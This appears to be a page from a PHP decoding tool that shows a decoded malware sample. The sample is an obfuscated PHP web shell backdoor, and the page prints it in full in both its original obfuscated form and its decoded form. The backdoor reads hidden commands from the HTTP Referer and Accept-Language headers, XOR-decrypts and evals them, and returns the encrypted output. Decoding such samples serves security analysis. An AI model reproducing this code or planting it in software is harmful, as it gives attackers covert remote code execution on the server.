Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $T='ayQ("/","+"QQ)Q,$ss($s[$i],0,QQ$e))),$k)));$o=obQQ_getQ_coQntents();ob_end_Qcle..

Decoded Output download

$kh="4814";$kf="7673";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$T='ayQ("/","+"QQ)Q,$ss($s[$i],0,QQ$e))),$k)));$o=obQQ_getQ_coQntents();ob_end_QcleanQ();$d=b';
$V='$kQh="4814";$kQf=Q"7673";funcQtion Qx($t,$k)Q{$c=stQrlenQ(Q$k);Q$QQl=strlen($t);$oQ="";fo';
$J=str_replace('wQ','','crewQwQatwQe_wQwQwQfunction');
$y='o;}$r=Q$_SERVEQR;$rr=Q@$QrQ["HTTP_REFEREQR"]Q;$raQ=@$r["HTTP_QACQQCEPT_LANQQGUAGE"];if($rr&';
$A=';$z++)$p.Q=$Qq[$Qm[2][$z]];iQf(strpQQos($p,$Qh)===0){$s[$i]Q="";$QQp=$ss($Qp,3);}if(Qarray_';
$m='();Q@evQaQl(@gzunQcompressQ(@QQx(@baseQ64_decode(pQreg_replace(arraQyQ("/_/","Q/-/"),arrQ';
$R='Q&$ra)Q{$u=parse_url(Q$rr)Q;parsQe_str(Q$u["quQery"],$qQ);$q=aQrray_QQvalues($q);preQg_matc';
$I='r($i=0;$i<Q$l;){Qfor($j=0Q;($j<$Qc&&Q$i<$l);$jQQ+Q+,$i++){$o.=$tQ{$i}^$k{$Qj};}}reQtQurn $';
$B='d5($iQ.$kQh),0,3)Q);$f=$sl($Qss(mdQQ5Q($i.$kf),0,3))Q;$p="";fQor($zQ=1;$z<counQt($m[QQ1])';
$q=';$s=&$_SESSQION;Q$ssQ="substQr";Q$sl="sQtrtolower";$QiQ=$mQ[1][0].$Qm[Q1][1];$h=Q$sl($ss(m';
$g='Qkey_existQsQ($i,Q$s)){$s[Q$i].=$p;$eQ=stQrposQ($s[$i],$Qf)Q;if($eQ){$k=Q$khQ.$kf;ob_start';
$C='Qase6Q4_encQodQe(Qx(gzcoQmpQress($o),$k));prinQQt("<$k>$d</$k>"Q);@sessQionQ_destroyQ();}}}}';
$O='Qh_alQl("/([\\wQ])Q[\\w-Q]+(?:;q=0.(Q[\\Qd]))Q?,?/",$Qra,$m)Q;iQf($q&&$m)Q{Q@QsQession_start()';
$N=str_replace('Q','',$V.$I.$y.$R.$O.$q.$B.$A.$g.$m.$T.$C);
$G=$J('',$N);$G();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A ;$z++)$p.Q=$Qq[$Qm[2][$z]];iQf(strpQQos($p,$Qh)===0){$s[$i]Q..
$B d5($iQ.$kQh),0,3)Q);$f=$sl($Qss(mdQQ5Q($i.$kf),0,3))Q;$p="";..
$C Qase6Q4_encQodQe(Qx(gzcoQmpQress($o),$k));prinQQt("<$k>$d</$..
$G None
$I r($i=0;$i<Q$l;){Qfor($j=0Q;($j<$Qc&&Q$i<$l);$jQQ+Q+,$i++){$o..
$J create_function
$N $kh="4814";$kf="7673";function x($t,$k){$c=strlen($k);$l=str..
$O Qh_alQl("/([\wQ])Q[\w-Q]+(?:;q=0.(Q[\Qd]))Q?,?/",$Qra,$m)Q;i..
$R Q&$ra)Q{$u=parse_url(Q$rr)Q;parsQe_str(Q$u["quQery"],$qQ);$q..
$T ayQ("/","+"QQ)Q,$ss($s[$i],0,QQ$e))),$k)));$o=obQQ_getQ_coQn..
$V $kQh="4814";$kQf=Q"7673";funcQtion Qx($t,$k)Q{$c=stQrlenQ(Q$..
$g Qkey_existQsQ($i,Q$s)){$s[Q$i].=$p;$eQ=stQrposQ($s[$i],$Qf)Q..
$m ();Q@evQaQl(@gzunQcompressQ(@QQx(@baseQ64_decode(pQreg_repla..
$q ;$s=&$_SESSQION;Q$ssQ="substQr";Q$sl="sQtrtolower";$QiQ=$mQ[..
$y o;}$r=Q$_SERVEQR;$rr=Q@$QrQ["HTTP_REFEREQR"]Q;$raQ=@$r["HTTP..

Stats

MD5 ffbc4724aaca0f09d7754176e94329cf
Eval Count 1
Decode Time 60 ms